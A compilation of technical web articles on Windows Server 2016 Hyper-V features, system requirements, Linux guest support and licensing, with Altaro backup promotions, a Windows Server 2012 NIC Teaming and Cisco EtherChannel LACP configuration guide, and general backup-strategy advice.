Generation 2 VMs also offer new, virtualization-based security. Microsoft’s Device Guard and Credential Guard offer protection against malware and credential theft inside guest VMs with configuration version 8 or higher.

Further functionality comes with the ability to hot add and remove network adapters and memory. In simple terms, this lets users add or remove network adapters while a machine is still running. While that feature is exclusive to Gen 2, both generations can now adjust the amount of memory utilised on-the-fly, even with the “dynamic memory” option disabled.
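Both operations can be performed from PowerShell while the VM is running; the VM, switch name and memory size below are examples only:

# Hot-add a network adapter to a running Generation 2 VM
Add-VMNetworkAdapter -VMName "LabVM" -SwitchName "External vSwitch"

# Adjust the assigned memory at runtime, even with dynamic memory disabled
Set-VMMemory -VMName "LabVM" -StartupBytes 8GB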

Backups and Checkpoints

Though Hyper-V offers significantly easier backups, the VSS system can be a little unreliable. In Windows Server 2016, Microsoft has built change tracking into Hyper-V, which makes it easier for third-party software vendors to create backup solutions.

However, a backup system isn’t much use if you have faulty checkpoints and snapshots. In Windows Server 2012, snapshots could cause serious problems in a production environment. Restoring a VM from a snapshot could put the database server out of sync, creating problems down the line.

Thankfully, this is remedied in Windows Server 2016. It introduces “production checkpoints”, which comply with support policies. The new checkpoints use VSS rather than saved states, greatly reducing the risks. The feature is enabled by default in Hyper-V.
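The checkpoint type can be confirmed or changed per VM from PowerShell; a short sketch with an example VM name:

# Use production checkpoints, falling back to standard checkpoints if VSS is unavailable
Set-VM -Name "LabVM" -CheckpointType Production

# Take a checkpoint of the running VM
Checkpoint-VM -Name "LabVM" -SnapshotName "Pre-Update"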

Rolling Cluster Upgrades

An efficient, reliable upgrade system is equally important. Microsoft has made upgrading from 2012 R2 to 2016 far easier than previous versions. Rather than requiring a separate cluster to start the migration process, 2016 introduces rolling cluster upgrades.

hyper-v cluster upgrade path

This lets admins upgrade a cluster without any downtime. Clusters run at the feature level of 2012 R2 until all the nodes are upgraded, at which point the user can either reverse it or enable the 2016 features with a PowerShell cmdlet.
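Once every node has been upgraded, the cluster functional level is raised with a single cmdlet; a minimal sketch:

# Check the current functional level (8 = Windows Server 2012 R2, 9 = Windows Server 2016)
(Get-Cluster).ClusterFunctionalLevel

# Commit the upgrade - this is irreversible once applied
Update-ClusterFunctionalLevel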

Networking

Further functionality is introduced to Hyper-V networking. Microsoft has enabled Remote Direct Memory Access (RDMA) for switch embedded teaming (SET). This lets admins group up to eight network adapters into a single virtual one, whilst still being able to use RDMA. For those unfamiliar, RDMA allows you to read and write memory without the use of a remote CPU, leading to less CPU utilization and latency.
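Creating a SET-enabled virtual switch is a one-liner; the switch and adapter names below are examples:

# Team two physical adapters into a single Switch Embedded Teaming (SET) virtual switch
New-VMSwitch -Name "SETswitch" -NetAdapterName "NIC1","NIC2" -EnableEmbeddedTeaming $true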

Another new feature is Virtual machine multi queues, or VMMQ. This builds on the previous VMQ by allowing multiple hardware queues for each VM. Thus, default queues are actually a set, with traffic spread between them.

Storage

Windows Server 2016 also makes changes to storage options for a more manageable experience. Shared virtual hard disks can now be resized while the machine is still online. New functionality also extends to guest clusters, which can protect virtual hard disks with Hyper-V replica.

Microsoft has updated its storage Quality of Service policies. QoS lets admins manage and monitor storage performance using scale-out file server roles. Windows Server 2016 makes several tweaks to that system.

Storage QoS now makes sure a VM can’t take all the storage resources, cutting out other machines’ options. This combines with the ability to define performance minimums and maximums for individual VMs, providing a more reliable experience.
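Policies are created on the cluster that hosts the storage (for example a Scale-Out File Server) and then attached to individual virtual hard disks. A rough sketch with example values:

# Create a policy guaranteeing 100 IOPS and capping usage at 5000 IOPS
$policy = New-StorageQosPolicy -Name "Gold" -MinimumIops 100 -MaximumIops 5000

# Apply the policy to all virtual hard disks of a VM
Get-VM -Name "LabVM" | Get-VMHardDiskDrive | Set-VMHardDiskDrive -QoSPolicyID $policy.PolicyId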

Finally, the storage of virtual machines can be monitored as soon as they start. These details are all viewable from a new, single location.

There are other options available for those struggling with storage space. Data Deduplication searches for redundant data by looking for duplicate files. The data is then sorted and compressed, optimizing the drive without compromising data integrity. Further improvements come in the form of a new VM configuration format. The new .vmcx files make data reading and writing more efficient, and lessen the chance of corruption.

Miscellaneous Hyper-V Improvements

Though Windows Server 2016 introduces some major improvements, there are also smaller ones that are very interesting. One is the ability to connect PCIe hardware directly to a VM. Microsoft calls it Discrete Device Assignment and currently supports NVMe storage, allowing for fast SSD speeds.
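Discrete Device Assignment is driven entirely from PowerShell. The outline below is only a rough sketch: the $locationPath variable is a placeholder for the PCIe location path (obtained from Device Manager), the device must first be disabled on the host, and the VM must be off with its Automatic Stop Action set to TurnOff:

# $locationPath holds the PCIe location path of the device, e.g. taken from Device Manager
Dismount-VMHostAssignableDevice -Force -LocationPath $locationPath

# Attach the device to the VM
Add-VMAssignableDevice -VMName "LabVM" -LocationPath $locationPath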

However, more exciting is the future of PCIe in Windows Server. Microsoft is working with GPU vendors to add support for specific GPUs, which could be useful for graphic intensive programs like rendering software and Photoshop.

There’s also a minor but important feature for Always On computers. A Connected Standby power state is now available, even with the Hyper-V role installed. Connected Standby is available with select CPUs, and lets the PC listen for notifications in a similar way to phones. If a message appears, the screen will light up, notifying the user.

Hyper-V System Requirements on Windows Server 2016

Naturally, some of these new features come with hardware requirements. Though those prerequisites haven’t changed dramatically since 2012 R2, Hyper-V still won’t work with every system. This is especially true if you want to utilize new features such as shielded VM and discrete device assignment.

General Requirements

First off, the general Hyper-V requirements. You’ll need the following specifications as a base, regardless of any extra features you want:

  • A processor that’s 64-bit and supports Second-Level Address Translation (SLAT). This is required for virtualization, but not for Hyper-V management tools.
  • At least 4 GB of RAM, preferably more, and higher amounts for multiple VMs.
  • VM Monitor Mode extensions
  • Virtualization turned on in BIOS or UEFI, including hardware-assisted virtualization and hardware-enforced Data Execution Prevention (DEP).

There are several ways to tell if you meet these requirements, but the easiest is through the command prompt or PowerShell (a PowerShell alternative is shown after the screenshot below). You can follow these steps:

  1. Press Windows + R
  2. Type cmd.exe (powershell.exe alternatively)
  3. In the command line, enter Systeminfo.exe and press Enter
  4. View your report under Hyper-V Requirements

hyper-v-requirements via cmd or powershell prompt
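On hosts with PowerShell 5.1 or later, the same information is also available directly from PowerShell; a quick sketch:

# Show the Hyper-V related requirement fields reported by the OS
Get-ComputerInfo -Property "HyperV*"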

Hyper-V Shielded Virtual Machines

As mentioned earlier, Shielded Virtual Machines have further requirements. The host needs the following:

  • UEFI 2.3.1c for secure and measured booting
  • TPM v2.0 if you want platform security asset protection
  • IOMMU (Intel VT-d) for direct memory access protection

 

vm-shielded-hyper-v-2016

In addition, VMs need to be Generation 2, and the guest operating system must be Windows Server 2016, 2012 R2, or 2012.

Discrete Device Management

The feature with the most requirements is Discrete Device Management. Hosts need supported processors, chipsets and firmware table, as follows:

  • Processor: Support for Intel Extended Page Table (EPT) or AMD Nested Page Table (NPT)
  • Chipset: Interrupt Remapping support, either Intel VT-d2, or AMD I/O memory management. It must also support DMA remapping and Access control services for PCI-e root ports.
  • Firmware tables: I/O MMU exposure to the Windows hypervisor is a must, and needs to be enabled in UEFI or BIOS.

Hyper-V Supported Guest Operating Systems

The availability of guest operating systems also varies slightly with Windows Server 2016. While Windows Server has the best virtual processor support, other systems still provide great functionality. Here’s the full list of Windows guest operating systems and their differences:

  • Windows Server 2016: 240 virtual processors (gen 2), 64 (gen 1)
  • Windows Server 2012 R2: 64 virtual processors
  • Windows Server 2012: 64 virtual processors
  • Windows Server 2008 R2 with SP 1: 64 virtual processors
  • Windows Server 2008 with SP 2: 4 virtual processors
  • Windows Small Business Server 2011: 4 virtual processors (standard edition) 2 (essentials edition)
  • Windows 10: 32 virtual processors
  • Windows 8.1: 32 virtual processors
  • Windows 7 with SP 1: 4 virtual processors (must be Professional, Enterprise, or Ultimate)
  • Windows Vista with Service Pack 2 (SP2): 2 virtual processors (must be Business, Enterprise, or Ultimate)

Guest OSs also vary in the support for Integration Services. In general, Windows 8.1 (Windows Server 2012) or higher has Integration Services built-in. Other versions usually require an upgrade or install after the guest operating system is set up.

Hyper-V Linux Support

Hyper-V support for Linux is a little more complex. Microsoft provides both emulated and Hyper-V specific devices, but the performance and features of emulated devices is limited. As a result, the software giant recommends using Hyper-V specific devices for Linux, alongside its Linux Integration Services (LIS) drivers.

LIS is integrated into the Linux kernel and is regularly updated, but this may not extend to users on older distributions. Thus, some users must download LIS manually.

That said, support for Linux in Windows Server 2016 is good, and builds on previous versions. Microsoft has LIS support for the following distributions:

CentOS

  • RHEL/CentOS 7.x, 64-bit
  • RHEL/CentOS 6.x, 64-bit (No built-in LIS for 6.0-6.3)
  • RHEL/CentOS 5.x, 32-bit (No built-in LIS before 5.9)

It’s worth noting that CentOS has some feature limitations, though these can vary depending on version. There are issues with static IP injection across the board when Network Manager is configured for a synthetic network adapter. In addition, VLAN trunking only works in 7.x, while PCI pass-through and SR-IOV only work on 7.3 and higher. Live virtual machine backups aren’t possible in 5.2, 5.3, or 5.4.

Debian

  • Jessie [8.0-8.5]
  • Wheezy [7.0-7.11]

Debian also has some restrictions. The main one is the inability to create file systems on VHDs larger than 2TB. There are live virtual machine backup problems here too, as backups do not work with ext2 file systems.

Oracle

  • Red Hat (No built-in LIS for 6.0-6.3)
    • 6.x - 32-bit, 32-bit PAE, 64-bit
    • 7.x - 64-bit
  • Unbreakable Enterprise Kernel

With RedHat, VLAN trunking only works on versions 7.0-7.2. It also has issues with virtual fibre channels, where the machine may not be able to mount correctly if LUN 0 has not been populated. Both RedHat and UEK may have to undergo a filesystem check if there are open file handles during backup and may fail silently if there is an iSCSI or pass-through disk attached.

SUSE

  • SLES 12 SP2
  • SLES 12 SP1 – 64-bit only
  • SLES 12 – 64-bit only
  • SLES 11 SP4
  • SLES 11 SP3
  • SLES 11 SP2
  • Open SUSE 12.3

SUSE has the same Static IP injection limitations as CentOS, so Network Manager must be turned off or configured correctly. Similarly, live backup issues mirror that of Oracle VMs. Finally, Windows Server 2016 users must type memory parameters in multiples of 128 MB or there will be Hot-Add failures and lack of a memory increase.

Ubuntu

  • 16.10
  • 16.04
  • 14.04
  • 12.04

Ubuntu suffers from some of the limitations mentioned earlier. Specifically, there are static IP injection problems with Network Manager, virtual fibre channel issues if LUN 0 isn’t populated (except for 12.04), and similar problems with live backups in 14.04+.

It’s worth noting that most of these problems can be solved by proper configuration. It’s worth checking the TechNet documentation for a full list of issues and solutions for each version. Microsoft also has some best practices for running Linux on Hyper-V.

Hyper-V Scalability

Other than OS and feature support, Hyper-V varies in its scalability. While we have mentioned some of the virtual hardware increases in Gen 2 VMs, there are other factors to consider too. Here are the maximum numbers for each virtual machine component:

  • Checkpoints: 50
  • Memory: 12 TB for Gen 2, 1 TB for Gen 1
  • Serial ports: 2
  • Virtual Fibre Channel adapters: 4
  • Virtual Floppy devices: 1
  • Virtual hard disk capacity: 64 TB VHDX, 2040 GB VHD
  • Virtual IDE disks: 4
  • Virtual processors: 240 for Gen 2, 64 for Gen 1, 320 for host OS
  • Virtual SCSI controllers: 4
  • Virtual SCSI disks: 256
  • Virtual network adapters: 12 (8 Hyper-V specific, 4 legacy)

There are also some limitations for each Hyper-V host, though many components are uncapped:

  • Logical processors: 512 (320 for host OS partition)
  • Memory: 24 TB
  • Virtual machines per server: 1024
  • Virtual processors per server: 2048

Finally, Hyper-V has some Failover Clustering maximums. There’s a maximum of 64 nodes per cluster, so admins need to be aware of that when planning. There’s also an 8,000 per cluster limit for running virtual machines. However, this can vary significantly depending on the use of physical memory by each VM, number of disk spindles, and networking and storage bandwidth.

Summary

Windows Server 2016 takes many of the traditional advantages of virtualization and extends them. With its latest release, Microsoft has managed to provide major increases in performance, security, and management without complex system requirements or lack of OS support.

The Redmond giant’s latest server OS brings huge improvements in the form of Nano Servers, Containers, Shielded VMs, and hardware virtualization. The result is an undeniably better operating system for hosting Hyper-V machines.

However, there are still some possible issues admins should be aware of. Windows Server 2016 collects telemetry data by default, and there’s no option to turn it off entirely. It consists of security information, basic device information, how apps are used, and more. Naturally, all this data is anonymised and is used to create significant improvements. Still, some users may not be happy with this change from 2012 R2.

Microsoft is moving to a different update model with 2016, which can be positive in some cases but negative in others. The company rolls out two updates per month, one with security fixes and another with quality fixes. Each falls on a different day of the month.

On the plus side, this removes the issue of security updates being unnecessary once the quality update rolls out. The annoyance comes from the automatic updates and restarts that are enabled by default. Naturally, admins don’t want their server restarting without their express permission, and it’s not uncommon for updates to cause an issue with certain applications. Though this can be configured in 2016, it’s not as simple as previous versions.

Despite this, Windows Server 2016 remains a huge step forward for Hyper-V virtualization. It introduces some great new virtualization features, and its fleshed out free version makes it a natural choice for small businesses.


Windows Server 2016 VM Backup with Altaro's New VM Backup with Augmented Inline Deduplication

Altaro has released Altaro VM Backup, a faster and lighter upgrade to its flagship Hyper-V and VMware backup solution, which now supports all Windows Server editions and includes several highly-requested features including unique Augmented Inline Deduplication technology and boot from backup.

Altaro’s unique Augmented Inline Deduplication delivers faster backups and restores on local and offsite locations by making sure that only new data is transferred to the backup or offsite location. This augmented inline deduplication technology solves a common problem found in conventional backup solutions, which deduplicate data only after the transfer process. With Altaro VM Backup, deduplication happens before the data is transferred. This not only provides quicker backups, but also reduces the amount of storage needed for those backups significantly more than any other solution on the market today.

"VM Backup is an important milestone at Altaro” said David Vella, CEO of Altaro. "Not only does it fully support all Windows Servers, our new and unique Augmented Inline Deduplication technology offers our customers the best storage savings in the industry"

Boot from Backup is another innovation in Altaro VM Backup that enables users to instantly boot any VM version from the backup location without affecting the integrity of the backup. If disaster strikes, the VM can be booted up instantly from the backup drive with minimal downtime, while the VM is restored back to the hypervisor in the background. A simple VM reboot completes the recovery process and preserves any changes made while the VM was booted.

For more information about Altaro VM Backup, visit altaro.com/vm-backup


Windows Server 2016 Licensing Made Easy – Understand Your Licensing Requirements & Different Server Editions

This article describes the new Windows Server 2016 licensing model (per-core licensing) Microsoft has implemented for its new server operating system. While the Windows Server 2012 licensing model was fairly straightforward (per CPU pair + CALs/DALs for Standard and Datacenter editions), Microsoft has decided to change its licensing arrangements because of the continuously increasing number of cores per physical processor, which was cutting into its profits.

Taking into consideration that the Intel Xeon E7-8890v4 contains a total of 24 cores capable of supporting up to 48 threads, one can quickly understand the software giant’s intention and why it is no longer continuing the per CPU Pair model for its Standard and Datacenter server editions.

Windows Server 2016 License Models

The Windows Server 2016 licensing model consists of per-core/processor licensing plus Client Access Licenses (CALs). Each user or device accessing a Windows Server Standard, Datacenter or MultiPoint edition requires a Windows Server CAL or, where Remote Desktop Services are used, a Windows Server CAL plus a Remote Desktop Services (RDS) CAL.

In addition to these changes, many would be surprised to know that there is now a minimum number of per-core licenses required per physical CPU and per server:

  • A minimum of 8 core licenses is required for each physical CPU.
  • A minimum of 16 core licenses is required for each server.
  • A 2-core license pack is the minimum amount of core licenses you can purchase. For example, you’ll need four 2-core license packs (4x2) to fully license an 8-core CPU.
  • The 2-core license is priced at 1/8 (one eighth) the price of a 2-CPU license for the corresponding Windows 2012 R2 edition in order to keep pricing similar. This means a 16-core Windows Server 2016 Datacenter server is priced the same as a 2-CPU Windows Server 2012 R2 Datacenter server.

How Licensing Changes Affect Small Windows Server Deployments

Thankfully, not much. Microsoft has adjusted its per-core license pricing so that a small deployment of up to 16 cores per physical server costs the same as a Windows Server 2012 2-CPU license.


The price difference becomes apparent for larger customers with servers that exceed 8 cores per CPU and 16 cores per server. These customers will end up paying more for their licenses. For example, a server with 2 x Intel Xeon E7-8890v4 CPUs has a total of 48 cores. Installing Windows Server 2016 Standard means that the initial 16-core license covers only 16 of the 48 cores, and the customer will need to purchase additional licenses to cover the 32 extra cores! It’s now clear why big customers are going to be paying the big bucks!
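The arithmetic can be scripted; here is a minimal PowerShell sketch of the calculation for the example above, applying the 8-cores-per-CPU and 16-cores-per-server minimums listed earlier:

# Core-license calculation for a 2-CPU, 24-core-per-CPU server
$cpus = 2; $coresPerCpu = 24
$licensedCores = [Math]::Max($cpus * [Math]::Max($coresPerCpu, 8), 16)   # apply the 8/CPU and 16/server minimums
$twoCorePacks  = [Math]::Ceiling($licensedCores / 2)                     # licenses are sold in 2-core packs
"Cores to license: $licensedCores  (2-core packs: $twoCorePacks)"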

The following table explains where additional licenses are required depending on the number of CPUs (processors) and cores per CPU. Remember - Minimum 8 cores/processor; 16 cores/server:

Windows Server 2016 Licensing: Calculating Licensing needs per CPU & Core

Figure 1. Windows Server 2016 Licensing: Calculating Licensing needs per CPU & Core

Windows Server 2016 Editions Overview, Licensing Models & CAL Requirements

Microsoft offers its Windows Server 2016 in 6 different editions. Let’s take a look at them and explain their primary role and usage:

Windows Server 2016 Datacenter: This edition targets highly virtualized datacenter and cloud environments. Main characteristics include its support for unlimited Hyper-V containers and Operating System Environments (OSEs, or virtual machines). It also supports an unlimited number of Windows Server containers and boasts features such as the Host Guardian Service, Storage Spaces Direct, Storage Replica, Shielded Virtual Machines (VMs), the new networking stack and more.

Windows Server 2016 Standard: Used for physical servers or environments with minimal virtualized requirements. This edition supports two Hyper-V containers or Operating System Environments (OSEs or virtual machines) alongside the Host Guardian Service.

The Host Guardian Service is a server role introduced in Windows Server 2016 and found in the Datacenter and Standard editions. It serves as a critical security component protecting the transport key, and works in conjunction with other Windows Server 2016 components to ensure high security levels for Shielded VMs.

Host Guardian Service helps ensure high security levels for Shielded VMs

Figure 2. Host Guardian Service helps ensure high security levels for Shielded VMs

Windows Server 2016 Essentials: Ideal for small businesses with no more than 25 users and 50 devices. This edition is also a great replacement for businesses running Windows Server 2012 Foundation, as that edition is not available for Windows Server 2016.

Windows Server 2016 MultiPoint Premium Server: Allows multiple users to share a single computer while having their own applications and Windows experience and is suitable for academic environments.

Windows Storage Server 2016: Suitable for dedicated storage solutions. It’s available in Standard and Workgroup editions and is mainly used by OEM manufacturers.

Microsoft Hyper-V Server 2016: The well-known free hypervisor, available as a free download. This is a stand-alone product that runs directly on the bare-metal server and is built using the same technology as the Hyper-V role on Windows Server 2016.

Readers can also download here the Free Microsoft Windows Server 2012/2016 Licensing Datasheet that provides additional useful information.

The table below shows the licensing model adopted by each Windows Server 2016 edition:

  • Windows Server 2016 Datacenter: Core-based licensing, Windows Server CAL required
  • Windows Server 2016 Standard: Core-based licensing, Windows Server CAL required
  • Windows Server 2016 Essentials: Processor-based licensing, no CAL required
  • Windows Server 2016 MultiPoint Premium: Processor-based licensing, Windows Server CAL + Remote Desktop Services CAL required
  • Windows Storage Server 2016: Processor-based licensing, no CAL required
  • Hyper-V Server 2016: N/A

Table 1. Windows Server 2016 Editions and Licensing Models

Summary

With Windows Server 2016 out it’s only a matter of time before organizations begin to upgrade their servers and use it for new rollouts. Understanding the Windows Server 2016 Licensing model and server editions is critical to ensuring the right choices are made based on the organization’s requirements and server hardware availability. The new Windows Server core-based licensing can be slightly tricky so make sure you know your hardware and license theory well!


Windows 2016 Server Licensing Explained – Free Webinar

With Windows 2016 Server already making its way into data centers, Windows 2016 Server licensing is becoming a very hot topic. Windows 2016 Server is jam-packed with advanced features including an added layer of security, new deployment options, built-in Hyper-V containers, advanced networking options and cloud-ready services.

Check out our "Windows Server 2016 Licensing Made Easy – Understand Your Licensing Requirements & Different Server Editions" article

Altaro Software, a reputable software vendor offering robust virtualization backup for Hyper-V & VMware, is hosting a free webinar on Tuesday the 29th of November 2016 that will cover the following important topics:

  • Licensing a Windows 2016 Server environment
  • Nested Hypervisors and containers in Windows 2016 Server
  • Understanding Licensing complexity

While this event has passed, it is still available as a recorded session, along with all material available as a free download. There is also a bonus Windows 2016 Server licensing eBook available for free! Click here to access all resources!

 


Windows Server 2016 – Hyper-V Virtualization Update

The new Hyper-V virtualization features offered by Windows Server 2016 are set to make major changes in the virtualization market: from nested Hyper-V, revolutionary security and new management options to service availability, storage and more.

Learn all about the hot new virtualization features offered by Windows Server 2016 by attending the free webinar hosted by Altaro and presented by two Microsoft Cloud and Datacenter Management MVPs, Andy Syrewicze and Aidan Finn.

To learn more about the free webinar and register click here.

Note: While this webinar's date has passed, a complete recording is available at the above URL, along with all the free downloadable material presented.

 


Windows 2012 Server NIC Teaming – Load Balancing/Failover (LBFO) and Cisco Catalyst EtherChannel LACP Configuration & Verification

NIC Teaming, also known as Load Balancing/Failover (LBFO), is an extremely useful feature supported by Windows Server 2012 that allows the aggregation of multiple network interface cards into one or more virtual network adapters. This enables us to combine the bandwidth of every physical network card into the virtual network adapter, creating a single large network connection from the server to the network. Apart from the increased bandwidth, NIC Teaming offers additional advantages such as load balancing, redundant links to our network and failover capabilities.


Windows Hyper-V is also capable of taking advantage of NIC Teaming, which further increases the reliability of our virtualization infrastructure and the bandwidth available to our VMs.

windows-server-nic-teaming-load-balancing-failover-lacp-1

Figure 1. Windows 2012 Server – Hyper-V NIC Teaming with Cisco Catalyst Switch

There are two basic NIC Teaming configurations: switch-independent teaming & switch-dependent teaming. Let’s take a look at each configuration and its advantages.

Switch-Independent Teaming

Switch-independent teaming offers the advantage of not requiring the switch to participate in the NIC Teaming process. Network cards from the server can connect to different switches within our network.

Switch-independent teaming is preferred when bandwidth isn’t an issue and we are mostly interested in creating a fault tolerant connection by placing a team member into standby mode so that when one network adapter or link fails, the standby network adapter automatically takes over. When a failed network adapter returns to its normal operating mode, the standby member will return to its standby status.

Switch-Dependent Teaming

Switch-dependent teaming requires the switch to participate in the teaming process, during which Windows Server 2012 negotiates with the switch to create one virtual link that aggregates the bandwidth of all physical network adapters. For example, a server with four 1Gbps network cards can be configured to create a single 4Gbps connection to the network.

Switch-dependent teaming supports two different modes: Generic or Static Teaming (IEEE 802.3ad) and Link Aggregation Control Protocol Teaming (IEEE 802.1ax, LACP). LACP is the mode used in the configuration example later in this article.

Load Balancing Mode - Load Distribution Algorithms

Load distribution algorithms are used to distribute outbound traffic amongst all available physical links, avoiding bottlenecks while at the same time utilizing all links. When configuring NIC Teaming in Windows Server 2012, we are required to select a Load Balancing Mode that makes use of one of the following load distribution algorithms:

Hyper-V Switch Port: Used primarily when configuring NIC Teaming within a Hyper-V virtualized environment. When Virtual Machine Queues (VMQs) are used, a queue can be placed on the specific network adapter where the traffic is expected to arrive, providing greater flexibility in virtual environments.

Address Hashing: This algorithm creates a hash based on one of the characteristics listed below and then assigns it to available network adapters to efficiently load balance traffic:

  • Source and Destination TCP ports plus Source and Destination IP addresses
  • Source and Destination IP addresses only
  • Source and Destination MAC addresses only

Dynamic: The Dynamic algorithm combines the best aspects of the two previous algorithms to create an effective load balancing mechanism. Here’s what it does:

  • Distributes outgoing traffic based on a hash of the TCP ports and IP addresses, with real-time rebalancing allowing flows to move back and forth between network adapters that are part of the same team.
  • Inbound traffic is distributed similarly to the Hyper-V Switch Port algorithm.

The Dynamic algorithm is the preferred Load Balancing Mode for Windows Server 2012 and the one we are covering in this article.

Click here for more technical articles covering Windows Server

Configuring NIC Teaming in Windows Server 2012

In this example, we’ll be teaming two 100Mbps network adapters on our server. Both network adapters are connected to the same switch and configured with an IP address within the same subnet 192.168.10.0/24.

To begin, open Server Manager and locate the NIC Teaming section under Local Server:

Locating NIC Teaming section in Server Manager Windows 2012 Server

Figure 2. Locating NIC Teaming section in Server Manager Windows 2012 Server

The lower right section of the NIC Teaming window displays the available network adapters that can be assigned to a new team. In our case these are two 100Mbps Ethernet adapters.

From the TEAM area, select Tasks and then New Team from the dropdown menu to create a new NIC Team:

Figure 3. Creating a new NIC Team in Windows Server 2012

At the NIC Teaming window select the adapters to be part of the new NIC Team. Ensure Teaming mode is set to the desired mode (LACP in our case) and Load balancing mode is set to Dynamic. The Standby Adapter option will be available when more than two network adapters are available for teaming. Optionally we can give the new NIC Team a unique name or leave it as is.

Finally, we can select the default VLAN under the Primary Team Interface option (not shown below). When ready, click on OK to save the configuration and create the NIC Team:

Figure 4. Configuring Teaming Mode, Load Balancing Mode and NIC Team members

Notice how the State of each network adapter is reported as Active – this indicates the adapter is correctly functioning as a member of the NIC Team.

When the new NIC Team window disappears we are brought back to the NIC Teaming window where Windows Server 2012 reports the NIC Teams currently configured, speed, status, Teaming Mode and Load Balancing mode:

Figure 5. Viewing NIC Teams, their status, speed, Teaming mode, Load balancing mode and more

As mentioned earlier, NIC Teaming creates a virtual adapter that combines the speed of all network adapters that are part of the NIC Team. As we can see below, Windows Server has created a 200Mbps network adapter named Team-1:

Figure 6. The newly created NIC Team Adapter in Windows 2012 Server

We should note that the MAC address used by the virtual adapter will usually be the MAC address of one of the physical network adapters.
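The same team can also be created from PowerShell with the built-in NetLbfo cmdlets; a minimal sketch, assuming the two physical adapters are named Ethernet0 and Ethernet1 (adapter and team names will differ on your server):

# Create an LACP team using the Dynamic load balancing algorithm
New-NetLbfoTeam -Name "Team-1" -TeamMembers "Ethernet0","Ethernet1" `
    -TeamingMode Lacp -LoadBalancingAlgorithm Dynamic -Confirm:$false
# Verify the team and the state of its members
Get-NetLbfoTeam -Name "Team-1"
Get-NetLbfoTeamMember -Team "Team-1"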


Cisco Catalyst Switch Configuration

Depending on the type of NIC Teaming selected, the switch attached to the server might need to be configured. Cisco Catalyst switches fully support NIC Teaming and other link aggregation technologies through the use of EtherChannel. Cisco Catalyst switches also support the Link Aggregation Control Protocol (LACP), which is the aggregation protocol we use when configuring the EtherChannel below.

More Information on Cisco Switches and configuration articles can be found in our dedicated Cisco Switches section

Create the EtherChannel interface by dedicating the same number of switch ports as there are physical network adapters participating in the NIC team. In our example, we’ve got two network adapters so we’ll be using two switch ports.

Configure both switch ports to be part of Channel-Group 1 and set it to active mode. The Port-Channel interface will be configured in Trunk mode for our example:

interface Port-channel1
switchport mode trunk
switchport trunk native vlan 20
!
interface FastEthernet1/0/1
switchport mode trunk
channel-group 1 mode active
switchport trunk native vlan 20
!
interface FastEthernet1/0/2
switchport mode trunk
channel-group 1 mode active
switchport trunk native vlan 20

Note: First create the Port-Channel interface and assign the physical interfaces to it using the channel-group 1 mode active command. After that, any commands entered under the Port-Channel interface will automatically be replicated to all port members (FastEthernet 1/0/1 & 1/0/2 in our example).

In case VLAN trunking support is required, do not forget to use the switchport mode trunk command to enable trunking and then switchport trunk native vlan X to configure the native VLAN for the EtherChannel, replacing X with the necessary VLAN number.

Additional Information: Configure VLANs and InterVLAN Routing on Cisco Catalyst switches

At this point, we are able to connect our server to the network. The show interface port-channel 1 command will provide a plethora of information about our Port-Channel, including bandwidth, interface members and other useful information:

FCX-3750-S# show interface port-channel 1
 
Port-channel1 is up, line protocol is up (connected)
Hardware is EtherChannel, address is 0015.627a.1585 (bia 0015.627a.1585)
MTU 1500 bytes, BW 200000 Kbit, DLY 100 usec,
     reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Full-duplex, 200Mb/s, link type is auto, media type is unknown
input flow-control is off, output flow-control is unsupported
Members in this channel: Fa1/0/1 Fa1/0/2
ARP type: ARPA, ARP Timeout 04:00:00
Last input never, output 00:00:01, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: fifo
Output queue: 0/40 (size/max)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 7000 bits/sec, 7 packets/sec
     9521 packets input, 7321804 bytes, 0 no buffer
     Received 3599 broadcasts (1623 multicasts)
     0 runts, 0 giants, 0 throttles
     0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored
     0 watchdog, 1623 multicast, 0 pause input
     0 input packets with dribble condition detected
     12038 packets output, 1875191 bytes, 0 underruns
     0 output errors, 0 collisions, 2 interface resets
     0 babbles, 0 late collision, 0 deferred
     0 lost carrier, 0 no carrier, 0 PAUSE output
     0 output buffer failures, 0 output buffers swapped out

The show Etherchannel 1 summary command provides additional information, including the aggregation protocol used, port members, their status and more:

FCX-3750-S# show etherchannel 1 summary
 
Flags: D - down       P - bundled in port-channel
       I - stand-alone s - suspended
       H - Hot-standby (LACP only)
       R - Layer3     S - Layer2
       U - in use     f - failed to allocate aggregator
       M - not in use, minimum links not met
       u - unsuitable for bundling
       w - waiting to be aggregated
       d - default port
Number of channel-groups in use: 1
Number of aggregators:           1
Group     Port-channel       Protocol       Ports
------+------------------+------------+------------------------
1            Po1(SU)         LACP         Fa1/0/1(P) Fa1/0/2(P)

This article covered Windows Server NIC Teaming and explained the different types of NIC Teaming, the protocols involved, the load balancing/distribution algorithms, and the configuration of both Windows Server 2012 and the Cisco Catalyst switch. To read more on Cisco switches, make sure you visit our Cisco Technical Knowledgebase which contains technical articles on Cisco switches, routers, firewalls and IP Telephony.


The Importance of a Comprehensive Backup Strategy for Physical and Virtual Servers

People and companies usually adopt a backup strategy suited to the needs of their working environment. As such, there is no absolute right or wrong method of backing up data; however, in order to back up and restore data swiftly and easily, a comprehensive strategy is necessary, even though most virtualized platforms such as Hyper-V and VMware offer built-in backup-like features such as snapshots or the ability to copy a whole virtual machine to another location.

Broadly, this encompasses the following rules, which we've briefly outlined below:

  • Backups must be performed automatically
  • Backups must have redundancy
  • A copy of the backup must be available offsite
  • Backups must be regularly tested
  • Usage of high-quality backup applications for Virtualized environments e.g VM Backup


Most often, people will not remember to take backups on time. They may keep deferring the task because of laziness, oversight or work pressure. Whatever the cause, it defeats the very purpose of backing up. Therefore, a backup solution that automates the task is essential. Simply configure it once and let it take backups at regular intervals.

Although backing up is essential and one backup is better than not backing up at all, there remains the risk of that single backup failing at the time of need. Therefore, your strategy must include having two different types of backup. Another advantage of this is you have greater flexibility when restoring data.

Unexpected events can lead to data loss at any time. Fire, floods, theft, power surge, lightning strikes and so many other things can play havoc with the best laid plans. If your systems and backups are at the same location, you are most likely to lose both. As a contingency measure, you must keep a copy of the backup at a site physically and geographically separated from your primary workplace. Accomplishing offsite backups is simple with automatic cloud backup services that also allow automated updating.

